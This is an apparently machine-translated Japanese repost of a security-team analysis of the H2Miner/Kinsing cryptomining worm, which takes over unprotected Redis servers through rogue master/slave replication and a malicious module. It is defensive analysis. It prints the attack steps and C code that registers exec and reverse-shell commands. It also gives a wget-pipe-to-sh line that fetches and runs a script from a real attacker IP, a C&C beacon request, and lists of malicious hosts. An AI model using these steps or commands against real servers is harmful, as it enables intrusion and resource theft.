3 日前、私のプロジェクトのサーバーの XNUMX つが同様のワームによって攻撃されました。 「それは何だったのか?」という質問への答えを求めてAlibaba Cloud セキュリティ チームによる素晴らしい記事を見つけました。 ハブレに関するこの記事が見つからなかったので、あなたのために特別に翻訳することにしました <XNUMX
エントリー
最近、Alibaba Cloud のセキュリティ チームは、H2Miner の突然の発生を発見しました。 このタイプの悪意のあるワームは、Redis の認証の欠如または脆弱なパスワードをシステムへのゲートウェイとして使用し、その後マスター/スレーブ同期を通じて自身の悪意のあるモジュールをスレーブと同期させ、最終的にこの悪意のあるモジュールを攻撃対象のマシンにダウンロードして悪意のあるプログラムを実行します。説明書。
これまで、システムへの攻撃は主に、スケジュールされたタスクや、攻撃者が Redis にログインした後にマシンに書き込まれる SSH キーを使用する方法を使用して実行されていました。 幸いなことに、この方法は、アクセス許可制御の問題やシステム バージョンの違いにより、多くの場合使用できません。 ただし、悪意のあるモジュールをロードするこの方法では、攻撃者のコマンドを直接実行したり、シェルにアクセスしたりする可能性があり、システムにとって危険です。
インターネット上には多数の Redis サーバー (約 1 万台) がホストされているため、Alibaba Cloud のセキュリティ チームは、ユーザーに対し、Redis をオンラインで共有せず、パスワードの強度とパスワードが侵害されているかどうかを定期的に確認することを推奨しています。素早い選択。
H2マイナー
H2Miner は Linux ベースのシステム用のマイニング ボットネットであり、Hadoop ヤーン、Docker、Redis リモート コマンド実行 (RCE) の脆弱性など、さまざまな方法でシステムに侵入する可能性があります。 ボットネットは、悪意のあるスクリプトやマルウェアをダウンロードしてデータをマイニングし、攻撃を水平方向に拡大し、コマンド アンド コントロール (C&C) 通信を維持することによって機能します。
Redis RCE
この主題に関する知識は、ZeroNights 2018 で Pavel Toporkov によって共有されました。バージョン 4.0 以降、Redis はプラグイン読み込み機能をサポートし、ユーザーが C でコンパイルされたファイルを Redis にロードして特定の Redis コマンドを実行できるようにします。 この機能は便利ですが、マスター/スレーブ モードで fullresync モードを介してファイルをスレーブと同期できるという脆弱性が含まれています。 攻撃者はこれを利用して、悪意のある so ファイルを転送する可能性があります。 転送が完了すると、攻撃者は攻撃対象の Redis インスタンスにモジュールをロードし、任意のコマンドを実行します。
マルウェア ワームの分析
最近、Alibaba Cloud セキュリティ チームは、H2Miner 悪意のあるマイナー グループのサイズが突然劇的に増加していることを発見しました。 分析によると、攻撃が発生する一般的なプロセスは次のとおりです。
H2Miner は、本格的な攻撃に RCE Redis を使用します。 攻撃者はまず、保護されていない Redis サーバーまたは弱いパスワードを持つサーバーを攻撃します。
次に、コマンドを使用します config set dbfilename red2.so ファイル名を変更します。 この後、攻撃者はコマンドを実行します。 slaveof マスター/スレーブ レプリケーションのホスト アドレスを設定します。
攻撃された Redis インスタンスが、攻撃者が所有する悪意のある Redis とのマスター/スレーブ接続を確立すると、攻撃者はファイルを同期するために fullresync コマンドを使用して感染したモジュールを送信します。 red2.so ファイルは攻撃されたマシンにダウンロードされます。 次に、攻撃者は ./red2.so ロード モジュールを使用して、この so ファイルをロードします。 このモジュールは、攻撃者からのコマンドを実行したり、逆接続 (バックドア) を開始して攻撃されたマシンにアクセスしたりすることができます。
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
次のような悪意のあるコマンドを実行した後 / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1を実行すると、攻撃者はバックアップ ファイル名をリセットし、システム モジュールをアンロードしてトレースをクリーンアップします。 ただし、red2.so ファイルは攻撃されたマシン上に残ります。 ユーザーは、Redis インスタンスのフォルダーにこのような不審なファイルが存在することに注意することをお勧めします。
攻撃者は、一部の悪意のあるプロセスを強制終了してリソースを盗むことに加えて、悪意のあるスクリプトに従い、悪意のあるバイナリ ファイルをダウンロードして実行しました。 。 これは、ホスト上のキンシングを含むプロセス名またはディレクトリ名が、そのマシンがこのウイルスに感染していることを示している可能性があることを意味します。
リバース エンジニアリングの結果によると、マルウェアは主に次の機能を実行します。
- ファイルのアップロードと実行
- 採掘
- C&C通信の維持と攻撃者のコマンドの実行
外部スキャンにmasscanを使用して影響力を拡大します。 さらに、C&C サーバーの IP アドレスはプログラム内でハードコーディングされており、攻撃されたホストは HTTP リクエストを使用して C&C 通信サーバーと通信します。その際、ゾンビ (侵害されたサーバー) の情報は HTTP ヘッダーで特定されます。
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
その他の攻撃方法
ワームが使用するアドレスとリンク
/キンシング
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
協議会
まず、Redis にはインターネットからアクセスできないようにし、強力なパスワードで保護する必要があります。 クライアントが、Redis ディレクトリに red2.so ファイルがないこと、およびホスト上のファイル/プロセス名に「キンシング」がないことを確認することも重要です。
出所: habr.com